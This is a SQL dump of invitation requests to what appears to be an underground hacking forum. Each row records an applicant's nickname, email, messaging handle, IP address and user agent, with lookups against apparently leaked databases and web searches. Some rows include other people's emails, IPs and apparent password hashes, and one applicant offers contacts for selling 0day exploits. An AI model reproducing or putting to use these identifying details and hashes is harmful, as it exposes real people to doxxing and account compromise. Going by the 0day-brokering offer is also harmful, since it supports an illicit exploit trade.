(1626, 1459, 0, 'Invite', 2, '{$name}', 1408214671, '[SIZE=\'4\'][COLOR=\'Sienna\']kxp[/COLOR][/SIZE]\n[QUOTE]\n[b]ICQ/Jabber[/b]: vbv@sj.ms\n[b]e-mail[/b]: toptoptopbhw@hotmail.com\n[b]Info[/b]: Coding: C++ (Win32), Delphi/Pascal, PHP\r\nHacking: SQL inj, XSS and so on\n[/QUOTE]\n[SIZE=\'4\'][COLOR=\'Sienna\']request from:[/COLOR][/SIZE]\n[QUOTE]\n[SIZE=\'1\']\n[LIST]\n[*][b]ip[/b]: 95.28.108.131\n[*][b]real ip[/b]: \n[*][b]User agent[/b]: Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.9.0.19) Gecko/2010031422 Firefox/3.0.19 ( .NET CLR 3.0.04506.648; .NET4.0C)\n[*][b]Referer[/b]: [url][/url]\n[/LIST]\n[/SIZE]\n[/QUOTE]\n[SIZE=\'4\'][COLOR=\'Sienna\']In our DBs:[/COLOR][/SIZE]\n[QUOTE]\n[SIZE=\'1\']\n[LIST]\n[*][b]Name[/b] : : : : \n[*][b]E-Mail[/b] : : : : \n[*][b]IP[/b] : : : : \n[/LIST]\n[/SIZE]\n[/QUOTE]\n[SIZE=\'4\'][COLOR=\'Sienna\']In Google:[/COLOR][/SIZE]\n[QUOTE]\n[SIZE=\'1\'] \n[LIST]\n[*][b]name[/b]: http://vk.com/kxp_spb | http://vk.com/kxp_spb \n[/url] \n[/LIST]\n[/SIZE]\n[/QUOTE]', 1, 0, '', 0, 1, 0, 0, 0),
(1627, 1460, 0, 'Invite', 2, '{$name}', 1408215917, '[SIZE=\'4\'][COLOR=\'Sienna\']Nickname[/COLOR][/SIZE]\n[QUOTE]\n[b]ICQ/Jabber[/b]: ICQ/Jabber\n[b]e-mail[/b]: Email@123.ru\n[b]Info[/b]: *************************************************************************\r\nThe decision will be made automatically, after u send request upload this page again.\r\n*************************************************************************\r\n\r\n*The most important field. Here you must specify the field of self-related knowledge of IT, their skills in various areas, their achievements, releases, profiles on famous it-portals, the possible usefulness of the project, and so on. A small description of yourself welcome. \r\n\r\n \n[/QUOTE]\n[SIZE=\'4\'][COLOR=\'Sienna\']request from:[/COLOR][/SIZE]\n[QUOTE]\n[SIZE=\'1\']\n[LIST]\n[*][b]ip[/b]: 173.254.216.66\n[*][b]real ip[/b]: \n[*][b]User agent[/b]: Mozilla/5.0 (Windows NT 6.1; rv:24.0) Gecko/20100101 Firefox/24.0\n[*][b]Referer[/b]: [url][/url]\n[/LIST]\n[/SIZE]\n[/QUOTE]\n[SIZE=\'4\'][COLOR=\'Sienna\']In our DBs:[/COLOR][/SIZE]\n[QUOTE]\n[SIZE=\'1\']\n[LIST]\n[*][b]Name[/b] : : : : \n[*][b]E-Mail[/b] : : : : \n[*][b]IP[/b] : : : : \n[/LIST]\n[/SIZE]\n[/QUOTE]\n[SIZE=\'4\'][COLOR=\'Sienna\']In Google:[/COLOR][/SIZE]\n[QUOTE]\n[SIZE=\'1\'] \n[LIST]\n[*][b]name[/b]: \n[/url] \n[/LIST]\n[/SIZE]\n[/QUOTE]', 1, 0, '', 0, 1, 0, 0, 0),
(1628, 1461, 0, 'Invite', 2, '{$name}', 1408218155, '[SIZE=\'4\'][COLOR=\'Sienna\']Dr.SHA6H[/COLOR][/SIZE]\n[QUOTE]\n[b]ICQ/Jabber[/b]: ICQ/Jabber\n[b]e-mail[/b]: s2dd2m@gmail.com\n[b]Info[/b]: *************************************************************************\r\nThe decision will be made automatically, after u send request upload this page again.\r\n*************************************************************************\r\n\r\n*The most important field. Here you must specify the field of self-related knowledge of IT, their skills in various areas, their achievements, releases, profiles on famous it-portals, the possible usefulness of the project, and so on. A small description of yourself welcome. \r\n\r\n \n[/QUOTE]\n[SIZE=\'4\'][COLOR=\'Sienna\']request from:[/COLOR][/SIZE]\n[QUOTE]\n[SIZE=\'1\']\n[LIST]\n[*][b]ip[/b]: 83.96.96.135\n[*][b]real ip[/b]: \n[*][b]User agent[/b]: Mozilla/5.0 (Windows NT 5.1; rv:23.0) Gecko/20100101 Firefox/23.0\n[*][b]Referer[/b]: [url][/url]\n[/LIST]\n[/SIZE]\n[/QUOTE]\n[SIZE=\'4\'][COLOR=\'Sienna\']In our DBs:[/COLOR][/SIZE]\n[QUOTE]\n[SIZE=\'1\']\n[LIST]\n[*][b]Name[/b] : : : : \n[*][b]E-Mail[/b] : : : : \n[*][b]IP[/b] : : : : \n[/LIST]\n[/SIZE]\n[/QUOTE]\n[SIZE=\'4\'][COLOR=\'Sienna\']In Google:[/COLOR][/SIZE]\n[QUOTE]\n[SIZE=\'1\'] \n[LIST]\n[*][b]name[/b]: http://www.youtube.com/user/SHA67Dr | http://www.youtube.com/user/SHA67Dr \n[/url] \n[/LIST]\n[/SIZE]\n[/QUOTE]', 1, 0, '', 0, 1, 0, 0, 0),
(1629, 1462, 0, 'Invite', 2, '{$name}', 1408219133, '[SIZE=\'4\'][COLOR=\'Sienna\']0x4h4x[/COLOR][/SIZE]\n[QUOTE]\n[b]ICQ/Jabber[/b]: ICQ/Jabber\n[b]e-mail[/b]: 0x4h4x@mail.ru\n[b]Info[/b]: *************************************************************************\r\nThe decision will be made automatically, after u send request upload this page again.\r\n*************************************************************************\r\n\r\n*The most important field. Here you must specify the field of self-related knowledge of IT, their skills in various areas, their achievements, releases, profiles on famous it-portals, the possible usefulness of the project, and so on. A small description of yourself welcome. \r\n\r\n \n[/QUOTE]\n[SIZE=\'4\'][COLOR=\'Sienna\']request from:[/COLOR][/SIZE]\n[QUOTE]\n[SIZE=\'1\']\n[LIST]\n[*][b]ip[/b]: 186.251.8.66\n[*][b]real ip[/b]: \n[*][b]User agent[/b]: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Ubuntu Chromium/34.0.1847.116 Chrome/34.0.1847.116 Safari/537.36\n[*][b]Referer[/b]: [url][/url]\n[/LIST]\n[/SIZE]\n[/QUOTE]\n[SIZE=\'4\'][COLOR=\'Sienna\']In our DBs:[/COLOR][/SIZE]\n[QUOTE]\n[SIZE=\'1\']\n[LIST]\n[*][b]Name[/b] : : : : \n[*][b]E-Mail[/b] : : : : \n[*][b]IP[/b] : : : : \n[/LIST]\n[/SIZE]\n[/QUOTE]\n[SIZE=\'4\'][COLOR=\'Sienna\']In Google:[/COLOR][/SIZE]\n[QUOTE]\n[SIZE=\'1\'] \n[LIST]\n[*][b]name[/b]: http://0x4h4x.deviantart.com | 0x4h4x.deviantart.com \n[/url] \n[/LIST]\n[/SIZE]\n[/QUOTE]', 1, 0, '', 0, 1, 0, 0, 0),
(1630, 1463, 0, 'Invite', 2, '{$name}', 1408219550, '[SIZE=\'4\'][COLOR=\'Sienna\']h0x[/COLOR][/SIZE]\n[QUOTE]\n[b]ICQ/Jabber[/b]: h0x@undermail.org\n[b]e-mail[/b]: h0x@undermail.org\n[b]Info[/b]: *************************************************************************\r\nThe decision will be made automatically, after u send request upload this page again.\r\n*************************************************************************\r\n\r\nWeb Hacker ++\r\nExploit Development\r\n\r\n\r\n \n[/QUOTE]\n[SIZE=\'4\'][COLOR=\'Sienna\']request from:[/COLOR][/SIZE]\n[QUOTE]\n[SIZE=\'1\']\n[LIST]\n[*][b]ip[/b]: 77.247.181.164\n[*][b]real ip[/b]: \n[*][b]User agent[/b]: Mozilla/5.0 (Windows NT 6.1; rv:24.0) Gecko/20100101 Firefox/24.0\n[*][b]Referer[/b]: [url][/url]\n[/LIST]\n[/SIZE]\n[/QUOTE]\n[SIZE=\'4\'][COLOR=\'Sienna\']In our DBs:[/COLOR][/SIZE]\n[QUOTE]\n[SIZE=\'1\']\n[LIST]\n[*][b]Name[/b] : : : : \n[*][b]E-Mail[/b] : : : : \n[*][b]IP[/b] : : : : \n[/LIST]\n[/SIZE]\n[/QUOTE]\n[SIZE=\'4\'][COLOR=\'Sienna\']In Google:[/COLOR][/SIZE]\n[QUOTE]\n[SIZE=\'1\'] \n[LIST]\n[*][b]name[/b]: http://www.drupal.ru/blog/85990 | http://www.drupal.ru/blog/85990 \n[/url] \n[/LIST]\n[/SIZE]\n[/QUOTE]', 1, 0, '', 0, 1, 0, 0, 0),
(1631, 1464, 0, 'Invite', 2, '{$name}', 1408221866, '[SIZE=\'4\'][COLOR=\'Sienna\']windburn[/COLOR][/SIZE]\n[QUOTE]\n[b]ICQ/Jabber[/b]: 5521453\n[b]e-mail[/b]: zettich@zettich.com\n[b]Info[/b]: *************************************************************************\r\nThe decision will be made automatically, after u send request upload this page again.\r\n*************************************************************************\r\n\r\n*The most important field. Here you must specify the field of self-related knowledge of IT, their skills in various areas, their achievements, releases, profiles on famous it-portals, the possible usefulness of the project, and so on. A small description of yourself welcome. \r\n\r\n \n[/QUOTE]\n[SIZE=\'4\'][COLOR=\'Sienna\']request from:[/COLOR][/SIZE]\n[QUOTE]\n[SIZE=\'1\']\n[LIST]\n[*][b]ip[/b]: 46.53.181.147\n[*][b]real ip[/b]: \n[*][b]User agent[/b]: Mozilla/5.0 (Windows NT 6.3; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/37.0.2062.76 Safari/537.36\n[*][b]Referer[/b]: [url][/url]\n[/LIST]\n[/SIZE]\n[/QUOTE]\n[SIZE=\'4\'][COLOR=\'Sienna\']In our DBs:[/COLOR][/SIZE]\n[QUOTE]\n[SIZE=\'1\']\n[LIST]\n[*][b]Name[/b] : : : : \n[*][b]E-Mail[/b] : : : : \n[*][b]IP[/b] : : : : \n[/LIST]\n[/SIZE]\n[/QUOTE]\n[SIZE=\'4\'][COLOR=\'Sienna\']In Google:[/COLOR][/SIZE]\n[QUOTE]\n[SIZE=\'1\'] \n[LIST]\n[*][b]name[/b]: \n[/url] \n[/LIST]\n[/SIZE]\n[/QUOTE]', 1, 0, '', 0, 1, 0, 0, 0),
(1632, 1465, 0, 'Invite', 2, '{$name}', 1408222461, '[SIZE=\'4\'][COLOR=\'Sienna\']zettich[/COLOR][/SIZE]\n[QUOTE]\n[b]ICQ/Jabber[/b]: 118909595\n[b]e-mail[/b]: zettich@zettich.com\n[b]Info[/b]: *************************************************************************\r\nThe decision will be made automatically, after u send request upload this page again.\r\n*************************************************************************\r\n\r\n*The most important field. Here you must specify the field of self-related knowledge of IT, their skills in various areas, their achievements, releases, profiles on famous it-portals, the possible usefulness of the project, and so on. A small description of yourself welcome. \r\n\r\n \n[/QUOTE]\n[SIZE=\'4\'][COLOR=\'Sienna\']request from:[/COLOR][/SIZE]\n[QUOTE]\n[SIZE=\'1\']\n[LIST]\n[*][b]ip[/b]: 46.53.181.147\n[*][b]real ip[/b]: \n[*][b]User agent[/b]: Mozilla/5.0 (Windows NT 6.3; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/37.0.2062.76 Safari/537.36\n[*][b]Referer[/b]: [url][/url]\n[/LIST]\n[/SIZE]\n[/QUOTE]\n[SIZE=\'4\'][COLOR=\'Sienna\']In our DBs:[/COLOR][/SIZE]\n[QUOTE]\n[SIZE=\'1\']\n[LIST]\n[*][b]Name[/b] : : : : \n[*][b]E-Mail[/b] : : : : \n[*][b]IP[/b] : : : : \n[/LIST]\n[/SIZE]\n[/QUOTE]\n[SIZE=\'4\'][COLOR=\'Sienna\']In Google:[/COLOR][/SIZE]\n[QUOTE]\n[SIZE=\'1\'] \n[LIST]\n[*][b]name[/b]: https://twitter.com/messju/status/2357578638 | https://twitter.com/messju/status/2357578638 \n[/url] \n[/LIST]\n[/SIZE]\n[/QUOTE]', 1, 0, '', 0, 1, 0, 0, 0),
(1633, 1466, 0, 'Invite', 2, '{$name}', 1408227626, '[SIZE=\'4\'][COLOR=\'Sienna\']Maximus[/COLOR][/SIZE]\n[QUOTE]\n[b]ICQ/Jabber[/b]: ICQ/Jabber\n[b]e-mail[/b]: Alexusmaximus@icloud.com\n[b]Info[/b]: *************************************************************************\r\nThe decision will be made automatically, after u send request upload this page again.\r\n*************************************************************************\r\n\r\n*The most important field. Here you must specify the field of self-related knowledge of IT, their skills in various areas, their achievements, releases, profiles on famous it-portals, the possible usefulness of the project, and so on. A small description of yourself welcome. \r\n\r\n \n[/QUOTE]\n[SIZE=\'4\'][COLOR=\'Sienna\']request from:[/COLOR][/SIZE]\n[QUOTE]\n[SIZE=\'1\']\n[LIST]\n[*][b]ip[/b]: 5.146.83.215\n[*][b]real ip[/b]: \n[*][b]User agent[/b]: Mozilla/5.0 (iPad; CPU OS 7_1_2 like Mac OS X) AppleWebKit/537.51.2 (KHTML, like Gecko) Version/7.0 Mobile/11D257 Safari/9537.53\n[*][b]Referer[/b]: [url][/url]\n[/LIST]\n[/SIZE]\n[/QUOTE]\n[SIZE=\'4\'][COLOR=\'Sienna\']In our DBs:[/COLOR][/SIZE]\n[QUOTE]\n[SIZE=\'1\']\n[LIST]\n[*][b]Name[/b] : MaXiMuS : maksimerasov@mail.ru : 81.88.212.154 : abe191d171af9ff1e9d31e5e123e6714\n[*][b]E-Mail[/b] : : : : \n[*][b]IP[/b] : : : : \n[/LIST]\n[/SIZE]\n[/QUOTE]\n[SIZE=\'4\'][COLOR=\'Sienna\']In Google:[/COLOR][/SIZE]\n[QUOTE]\n[SIZE=\'1\'] \n[LIST]\n[*][b]name[/b]: http://maximus.aero | maximus.aero \n[/url] \n[/LIST]\n[/SIZE]\n[/QUOTE]', 1, 0, '', 0, 1, 0, 0, 0),
(1634, 1467, 0, 'Invite', 2, '{$name}', 1408227628, '[SIZE=\'4\'][COLOR=\'Sienna\']Maximus[/COLOR][/SIZE]\n[QUOTE]\n[b]ICQ/Jabber[/b]: ICQ/Jabber\n[b]e-mail[/b]: Alexusmaximus@icloud.com\n[b]Info[/b]: *************************************************************************\r\nThe decision will be made automatically, after u send request upload this page again.\r\n*************************************************************************\r\n\r\n*The most important field. Here you must specify the field of self-related knowledge of IT, their skills in various areas, their achievements, releases, profiles on famous it-portals, the possible usefulness of the project, and so on. A small description of yourself welcome. \r\n\r\n \n[/QUOTE]\n[SIZE=\'4\'][COLOR=\'Sienna\']request from:[/COLOR][/SIZE]\n[QUOTE]\n[SIZE=\'1\']\n[LIST]\n[*][b]ip[/b]: 5.146.83.215\n[*][b]real ip[/b]: \n[*][b]User agent[/b]: Mozilla/5.0 (iPad; CPU OS 7_1_2 like Mac OS X) AppleWebKit/537.51.2 (KHTML, like Gecko) Version/7.0 Mobile/11D257 Safari/9537.53\n[*][b]Referer[/b]: [url][/url]\n[/LIST]\n[/SIZE]\n[/QUOTE]\n[SIZE=\'4\'][COLOR=\'Sienna\']In our DBs:[/COLOR][/SIZE]\n[QUOTE]\n[SIZE=\'1\']\n[LIST]\n[*][b]Name[/b] : MaXiMuS : maksimerasov@mail.ru : 81.88.212.154 : abe191d171af9ff1e9d31e5e123e6714\n[*][b]E-Mail[/b] : : : : \n[*][b]IP[/b] : : : : \n[/LIST]\n[/SIZE]\n[/QUOTE]\n[SIZE=\'4\'][COLOR=\'Sienna\']In Google:[/COLOR][/SIZE]\n[QUOTE]\n[SIZE=\'1\'] \n[LIST]\n[*][b]name[/b]: http://maximus.aero | maximus.aero \n[/url] \n[/LIST]\n[/SIZE]\n[/QUOTE]', 1, 0, '', 0, 1, 0, 0, 0),
(1635, 1468, 0, 'Invite', 2, '{$name}', 1408228065, '[SIZE=\'4\'][COLOR=\'Sienna\']x3n70x[/COLOR][/SIZE]\n[QUOTE]\n[b]ICQ/Jabber[/b]: x3n70x@exploit.im\n[b]e-mail[/b]: x3n70x@hush.ai\n[b]Info[/b]: *************************************************************************\r\nThe decision will be made automatically, after u send request upload this page again.\r\n*************************************************************************\r\n\r\n*The most important field. Here you must specify the field of self-related knowledge of IT, their skills in various areas, their achievements, releases, profiles on famous it-portals, the possible usefulness of the project, and so on. A small description of yourself welcome. \r\n\r\n \n[/QUOTE]\n[SIZE=\'4\'][COLOR=\'Sienna\']request from:[/COLOR][/SIZE]\n[QUOTE]\n[SIZE=\'1\']\n[LIST]\n[*][b]ip[/b]: 79.134.235.132\n[*][b]real ip[/b]: \n[*][b]User agent[/b]: Mozilla/5.0 (X11; Linux x86_64; rv:24.0) Gecko/20140722 Firefox/24.0 Iceweasel/24.7.0\n[*][b]Referer[/b]: [url][/url]\n[/LIST]\n[/SIZE]\n[/QUOTE]\n[SIZE=\'4\'][COLOR=\'Sienna\']In our DBs:[/COLOR][/SIZE]\n[QUOTE]\n[SIZE=\'1\']\n[LIST]\n[*][b]Name[/b] : : : : \n[*][b]E-Mail[/b] : : : : \n[*][b]IP[/b] : : : : \n[/LIST]\n[/SIZE]\n[/QUOTE]\n[SIZE=\'4\'][COLOR=\'Sienna\']In Google:[/COLOR][/SIZE]\n[QUOTE]\n[SIZE=\'1\'] \n[LIST]\n[*][b]name[/b]: http://x3n70x.unedqsvyn1.biz | x3n70x.unedqsvyn1.biz \n[/url] \n[/LIST]\n[/SIZE]\n[/QUOTE]', 1, 0, '', 0, 1, 0, 0, 0),
(1636, 1469, 0, 'Invite', 2, '{$name}', 1408243484, '[SIZE=\'4\'][COLOR=\'Sienna\']3r3b0s[/COLOR][/SIZE]\n[QUOTE]\n[b]ICQ/Jabber[/b]: 3r3b0s@dcdark.net\n[b]e-mail[/b]: 3r3b0s@safe-mail.net\n[b]Info[/b]: *************************************************************************\r\nThe decision will be made automatically, after u send request upload this page again.\r\n*************************************************************************\r\n\r\n*The most important field. Here you must specify the field of self-related knowledge of IT, their skills in various areas, their achievements, releases, profiles on famous it-portals, the possible usefulness of the project, and so on. A small description of yourself welcome. \r\n\r\n \n[/QUOTE]\n[SIZE=\'4\'][COLOR=\'Sienna\']request from:[/COLOR][/SIZE]\n[QUOTE]\n[SIZE=\'1\']\n[LIST]\n[*][b]ip[/b]: 184.97.141.48\n[*][b]real ip[/b]: \n[*][b]User agent[/b]: Mozilla/5.0 (Windows NT 6.0; rv:31.0) Gecko/20100101 Firefox/31.0\n[*][b]Referer[/b]: [url][/url]\n[/LIST]\n[/SIZE]\n[/QUOTE]\n[SIZE=\'4\'][COLOR=\'Sienna\']In our DBs:[/COLOR][/SIZE]\n[QUOTE]\n[SIZE=\'1\']\n[LIST]\n[*][b]Name[/b] : : : : \n[*][b]E-Mail[/b] : : : : \n[*][b]IP[/b] : : : : \n[/LIST]\n[/SIZE]\n[/QUOTE]\n[SIZE=\'4\'][COLOR=\'Sienna\']In Google:[/COLOR][/SIZE]\n[QUOTE]\n[SIZE=\'1\'] \n[LIST]\n[*][b]name[/b]: http://www.lolpro.com/members/3R3B0S | http://www.lolpro.com/members/3R3B0S \n[/url] \n[/LIST]\n[/SIZE]\n[/QUOTE]', 1, 0, '', 0, 1, 0, 0, 0),
(1637, 1470, 0, 'Invite', 2, '{$name}', 1408243588, '[SIZE=\'4\'][COLOR=\'Sienna\']3r3b0s[/COLOR][/SIZE]\n[QUOTE]\n[b]ICQ/Jabber[/b]: 3r3b0s@dcdark.net\n[b]e-mail[/b]: 3r3b0s@safe-mail.net\n[b]Info[/b]: *************************************************************************\r\nThe decision will be made automatically, after u send request upload this page again.\r\n*************************************************************************\r\n\r\n*The most important field. Here you must specify the field of self-related knowledge of IT, their skills in various areas, their achievements, releases, profiles on famous it-portals, the possible usefulness of the project, and so on. A small description of yourself welcome. \r\n\r\n \n[/QUOTE]\n[SIZE=\'4\'][COLOR=\'Sienna\']request from:[/COLOR][/SIZE]\n[QUOTE]\n[SIZE=\'1\']\n[LIST]\n[*][b]ip[/b]: 184.97.141.48\n[*][b]real ip[/b]: 184.97.141.48\n[*][b]User agent[/b]: Mozilla/5.0 (Windows NT 6.0; rv:31.0) Gecko/20100101 Firefox/31.0\n[*][b]Referer[/b]: [url][/url]\n[/LIST]\n[/SIZE]\n[/QUOTE]\n[SIZE=\'4\'][COLOR=\'Sienna\']In our DBs:[/COLOR][/SIZE]\n[QUOTE]\n[SIZE=\'1\']\n[LIST]\n[*][b]Name[/b] : : : : \n[*][b]E-Mail[/b] : : : : \n[*][b]IP[/b] : : : : \n[/LIST]\n[/SIZE]\n[/QUOTE]\n[SIZE=\'4\'][COLOR=\'Sienna\']In Google:[/COLOR][/SIZE]\n[QUOTE]\n[SIZE=\'1\'] \n[LIST]\n[*][b]name[/b]: http://www.lolpro.com/members/3R3B0S | http://www.lolpro.com/members/3R3B0S \n[/url] \n[/LIST]\n[/SIZE]\n[/QUOTE]', 1, 0, '', 0, 1, 0, 0, 0),
(1638, 1471, 0, 'Invite', 2, '{$name}', 1408244428, '[SIZE=\'4\'][COLOR=\'Sienna\']Scrack[/COLOR][/SIZE]\n[QUOTE]\n[b]ICQ/Jabber[/b]: 601082570\n[b]e-mail[/b]: scrack96@gmail.com\n[b]Info[/b]: *************************************************************************\r\nThe decision will be made automatically, after u send request upload this page again.\r\n*************************************************************************\r\n\r\n*The most important field. Here you must specify the field of self-related knowledge of IT, their skills in various areas, their achievements, releases, profiles on famous it-portals, the possible usefulness of the project, and so on. A small description of yourself welcome. \r\n\r\n \n[/QUOTE]\n[SIZE=\'4\'][COLOR=\'Sienna\']request from:[/COLOR][/SIZE]\n[QUOTE]\n[SIZE=\'1\']\n[LIST]\n[*][b]ip[/b]: 186.150.12.94\n[*][b]real ip[/b]: \n[*][b]User agent[/b]: Mozilla/5.0 (X11; Linux x86_64; rv:31.0) Gecko/20100101 Firefox/31.0\n[*][b]Referer[/b]: [url][/url]\n[/LIST]\n[/SIZE]\n[/QUOTE]\n[SIZE=\'4\'][COLOR=\'Sienna\']In our DBs:[/COLOR][/SIZE]\n[QUOTE]\n[SIZE=\'1\']\n[LIST]\n[*][b]Name[/b] : : : : \n[*][b]E-Mail[/b] : : : : \n[*][b]IP[/b] : : : : \n[/LIST]\n[/SIZE]\n[/QUOTE]\n[SIZE=\'4\'][COLOR=\'Sienna\']In Google:[/COLOR][/SIZE]\n[QUOTE]\n[SIZE=\'1\'] \n[LIST]\n[*][b]name[/b]: https://twitter.com/ScrackCartoons | https://twitter.com/ScrackCartoons \n[/url] \n[/LIST]\n[/SIZE]\n[/QUOTE]', 1, 0, '', 0, 1, 0, 0, 0),
(1639, 1472, 0, 'Invite', 2, '{$name}', 1408255415, '[SIZE=\'4\'][COLOR=\'Sienna\']sash[/COLOR][/SIZE]\n[QUOTE]\n[b]ICQ/Jabber[/b]: \n[b]e-mail[/b]: sasha.raaad@gmail.com\n[b]Info[/b]: i have years of penetration testing , reverse engineering and exploit development i don\'t usually play in forums cuz i\'m getting old , also i have a lot of connections for selling the 0days if they are fresh and real and so it with be beneficial \n[/QUOTE]\n[SIZE=\'4\'][COLOR=\'Sienna\']request from:[/COLOR][/SIZE]\n[QUOTE]\n[SIZE=\'1\']\n[LIST]\n[*][b]ip[/b]: 125.27.44.13\n[*][b]real ip[/b]: \n[*][b]User agent[/b]: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_9_4) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/36.0.1985.143 Safari/537.36\n[*][b]Referer[/b]: [url][/url]\n[/LIST]\n[/SIZE]\n[/QUOTE]\n[SIZE=\'4\'][COLOR=\'Sienna\']In our DBs:[/COLOR][/SIZE]\n[QUOTE]\n[SIZE=\'1\']\n[LIST]\n[*][b]Name[/b] : sash : alexandr-nosov@yandex.ru : : 759b3f4f2f10b6f149da0b62b30b3bd7\n[*][b]E-Mail[/b] : : : : \n[*][b]IP[/b] : : : : \n[/LIST]\n[/SIZE]\n[/QUOTE]\n[SIZE=\'4\'][COLOR=\'Sienna\']In Google:[/COLOR][/SIZE]\n[QUOTE]\n[SIZE=\'1\'] \n[LIST]\n[*][b]name[/b]: http://sash.net | sash.net \n[/url] \n[/LIST]\n[/SIZE]\n[/QUOTE]', 1, 0, '', 0, 1, 0, 0, 0),
(1640, 1473, 0, 'Invite', 2, '{$name}', 1408261167, '[SIZE=\'4\'][COLOR=\'Sienna\']delta12[/COLOR][/SIZE]\n[QUOTE]\n[b]ICQ/Jabber[/b]: delta12@exploit.im\n[b]e-mail[/b]: cdwin@ymail.com\n[b]Info[/b]: *************************************************************************\r\nThe decision will be made automatically, after u send request upload this page again.\r\n*************************************************************************\r\n\r\n*The most important field. Here you must specify the field of self-related knowledge of IT, their skills in various areas, their achievements, releases, profiles on famous it-portals, the possible usefulness of the project, and so on. A small description of yourself welcome. \r\n\r\n \n[/QUOTE]\n[SIZE=\'4\'][COLOR=\'Sienna\']request from:[/COLOR][/SIZE]\n[QUOTE]\n[SIZE=\'1\']\n[LIST]\n[*][b]ip[/b]: 117.242.236.190\n[*][b]real ip[/b]: \n[*][b]User agent[/b]: Mozilla/5.0 (Windows NT 6.1; rv:31.0) Gecko/20100101 Firefox/31.0\n[*][b]Referer[/b]: [url][/url]\n[/LIST]\n[/SIZE]\n[/QUOTE]\n[SIZE=\'4\'][COLOR=\'Sienna\']In our DBs:[/COLOR][/SIZE]\n[QUOTE]\n[SIZE=\'1\']\n[LIST]\n[*][b]Name[/b] : : : : \n[*][b]E-Mail[/b] : : : : \n[*][b]IP[/b] : : : : \n[/LIST]\n[/SIZE]\n[/QUOTE]\n[SIZE=\'4\'][COLOR=\'Sienna\']In Google:[/COLOR][/SIZE]\n[QUOTE]\n[SIZE=\'1\'] \n[LIST]\n[*][b]name[/b]: https://twitter.com/hashtag/delta12 | https://twitter.com/hashtag/delta12 \n[/url] \n[/LIST]\n[/SIZE]\n[/QUOTE]', 1, 0, '', 0, 1, 0, 0, 0),
(1641, 1474, 0, 'Invite', 2, '{$name}', 1408263637, '[SIZE=\'4\'][COLOR=\'Sienna\']pappettee[/COLOR][/SIZE]\n[QUOTE]\n[b]ICQ/Jabber[/b]: 111000724\n[b]e-mail[/b]: lannnser@gmail.com\n[b]Info[/b]: *************************************************************************\r\nThe decision will be made automatically, after u send request upload this page again.\r\n*************************************************************************\r\n\r\n*The most important field. Here you must specify the field of self-related knowledge of IT, their skills in various areas, their achievements, releases, profiles on famous it-portals, the possible usefulness of the project, and so on. A small description of yourself welcome. \r\n\r\n \n[/QUOTE]\n[SIZE=\'4\'][COLOR=\'Sienna\']request from:[/COLOR][/SIZE]\n[QUOTE]\n[SIZE=\'1\']\n[LIST]\n[*][b]ip[/b]: 50.7.139.197\n[*][b]real ip[/b]: 50.7.139.197\n[*][b]User agent[/b]: \n[*][b]Referer[/b]: [url][/url]\n[/LIST]\n[/SIZE]\n[/QUOTE]\n[SIZE=\'4\'][COLOR=\'Sienna\']In our DBs:[/COLOR][/SIZE]\n[QUOTE]\n[SIZE=\'1\']\n[LIST]\n[*][b]Name[/b] : : : : \n[*][b]E-Mail[/b] : : : : \n[*][b]IP[/b] : : : : \n[/LIST]\n[/SIZE]\n[/QUOTE]\n[SIZE=\'4\'][COLOR=\'Sienna\']In Google:[/COLOR][/SIZE]\n[QUOTE]\n[SIZE=\'1\'] \n[LIST]\n[*][b]name[/b]: https://twitter.com/Sistiana/status/153968518365327360 | https://twitter.com/Sistiana/status/153968518365327360 \n[/url] \n[/LIST]\n[/SIZE]\n[/QUOTE]', 1, 0, '', 0, 1, 0, 0, 0),
(1642, 1475, 0, 'Invite', 2, '{$name}', 1408263662, '[SIZE=\'4\'][COLOR=\'Sienna\']pappettee[/COLOR][/SIZE]\n[QUOTE]\n[b]ICQ/Jabber[/b]: 111000724\n[b]e-mail[/b]: lannnser@gmail.com\n[b]Info[/b]: *************************************************************************\r\nThe decision will be made automatically, after u send request upload this page again.\r\n*************************************************************************\r\n\r\n*The most important field. Here you must specify the field of self-related knowledge of IT, their skills in various areas, their achievements, releases, profiles on famous it-portals, the possible usefulness of the project, and so on. A small description of yourself welcome. \r\n\r\n \n[/QUOTE]\n[SIZE=\'4\'][COLOR=\'Sienna\']request from:[/COLOR][/SIZE]\n[QUOTE]\n[SIZE=\'1\']\n[LIST]\n[*][b]ip[/b]: 50.7.139.197\n[*][b]real ip[/b]: 50.7.139.197\n[*][b]User agent[/b]: \n[*][b]Referer[/b]: [url][/url]\n[/LIST]\n[/SIZE]\n[/QUOTE]\n[SIZE=\'4\'][COLOR=\'Sienna\']In our DBs:[/COLOR][/SIZE]\n[QUOTE]\n[SIZE=\'1\']\n[LIST]\n[*][b]Name[/b] : : : : \n[*][b]E-Mail[/b] : : : : \n[*][b]IP[/b] : : : : \n[/LIST]\n[/SIZE]\n[/QUOTE]\n[SIZE=\'4\'][COLOR=\'Sienna\']In Google:[/COLOR][/SIZE]\n[QUOTE]\n[SIZE=\'1\'] \n[LIST]\n[*][b]name[/b]: https://twitter.com/Sistiana/status/153968518365327360 | https://twitter.com/Sistiana/status/153968518365327360 \n[/url] \n[/LIST]\n[/SIZE]\n[/QUOTE]', 1, 0, '', 0, 1, 0, 0, 0),
